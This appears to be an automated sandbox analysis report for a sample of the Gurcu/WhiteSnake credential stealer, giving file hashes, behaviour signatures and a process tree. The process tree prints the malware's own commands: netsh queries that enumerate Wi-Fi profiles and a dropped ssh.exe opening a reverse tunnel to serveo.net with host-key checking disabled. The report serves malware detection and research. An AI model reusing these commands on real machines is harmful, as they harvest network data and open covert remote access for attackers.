Overview

overview

10

Static

static

1

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    149s
  • platform
    windows10-1703_x64
  • resource
    win10-20230831-en
  • resource tags

    arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23-09-2023 20:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe

  • Size

    62KB

  • MD5

    5f0bbf0b4ce5fa0bca57f1230e660dff

  • SHA1

    529e438c21899eff993c0871ce07aff037d7f10d

  • SHA256

    a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d

  • SHA512

    ddede174b3aac4bbf434e1d61da8fa858b4bde11850a75b113376dccb7356f054a9fb696f498cb01c040cec33bb03d75c8c7b2787d46fc33569aeb753ee16131

  • SSDEEP

    768:I6rewtkBtW3vKSuJS4/bk/4wYMucso7ufooXRsG4TsJOTYp/eKcZbsDzmiKwnq+R:nkjWfKSYS4Yfso8DXt4IroJqYPmkK

Score
10/10
gurcucollectionstealer

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe
    "C:\Users\Admin\AppData\Local\Temp\a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5064
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:3020
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
            PID:4432
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profiles
            4⤵
              PID:2868
            • C:\Windows\SysWOW64\findstr.exe
              findstr /R /C:"[ ]:[ ]"
              4⤵
                PID:2492
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2488
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                4⤵
                  PID:5080
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  4⤵
                    PID:2548
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "SSID BSSID Signal"
                    4⤵
                      PID:3304
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                    "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7465 serveo.net
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1364

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                Filesize

                1.5MB

                MD5

                79a6e2268dfdba1d94c27f4b17265ff4

                SHA1

                b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                SHA256

                6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                SHA512

                3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                Download Submit

              • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                Filesize

                914KB

                MD5

                d1ce628a81ab779f1e8f7bf7df1bb32c

                SHA1

                011c90c704bb4782001d6e6ce1c647bf2bb17e01

                SHA256

                2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                SHA512

                de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                Download Submit

              • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                Filesize

                914KB

                MD5

                d1ce628a81ab779f1e8f7bf7df1bb32c

                SHA1

                011c90c704bb4782001d6e6ce1c647bf2bb17e01

                SHA256

                2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                SHA512

                de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                Download Submit

              • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                Filesize

                914KB

                MD5

                d1ce628a81ab779f1e8f7bf7df1bb32c

                SHA1

                011c90c704bb4782001d6e6ce1c647bf2bb17e01

                SHA256

                2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                SHA512

                de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                Download Submit

              • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                Filesize

                1.5MB

                MD5

                79a6e2268dfdba1d94c27f4b17265ff4

                SHA1

                b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                SHA256

                6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                SHA512

                3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                Download Submit

              • memory/3020-11-0x00000000053F0000-0x0000000005400000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3020-14-0x00000000062E0000-0x0000000006346000-memory.dmp

                Filesize

                408KB

                Download

              • memory/3020-7-0x0000000000400000-0x000000000044E000-memory.dmp

                Filesize

                312KB

                Download

              • memory/3020-130-0x00000000053F0000-0x0000000005400000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3020-10-0x0000000073630000-0x0000000073D1E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3020-129-0x0000000073630000-0x0000000073D1E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3020-13-0x0000000006240000-0x00000000062D2000-memory.dmp

                Filesize

                584KB

                Download

              • memory/5064-6-0x0000000006DB0000-0x00000000072AE000-memory.dmp

                Filesize

                5.0MB

                Download

              • memory/5064-5-0x0000000006800000-0x000000000684C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/5064-4-0x0000000006720000-0x0000000006782000-memory.dmp

                Filesize

                392KB

                Download

              • memory/5064-3-0x0000000006570000-0x00000000065E4000-memory.dmp

                Filesize

                464KB

                Download

              • memory/5064-2-0x0000000005280000-0x0000000005290000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5064-1-0x0000000073630000-0x0000000073D1E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/5064-0-0x00000000009D0000-0x00000000009E4000-memory.dmp

                Filesize

                80KB

                Download

              • memory/5064-9-0x0000000073630000-0x0000000073D1E000-memory.dmp

                Filesize

                6.9MB

                Download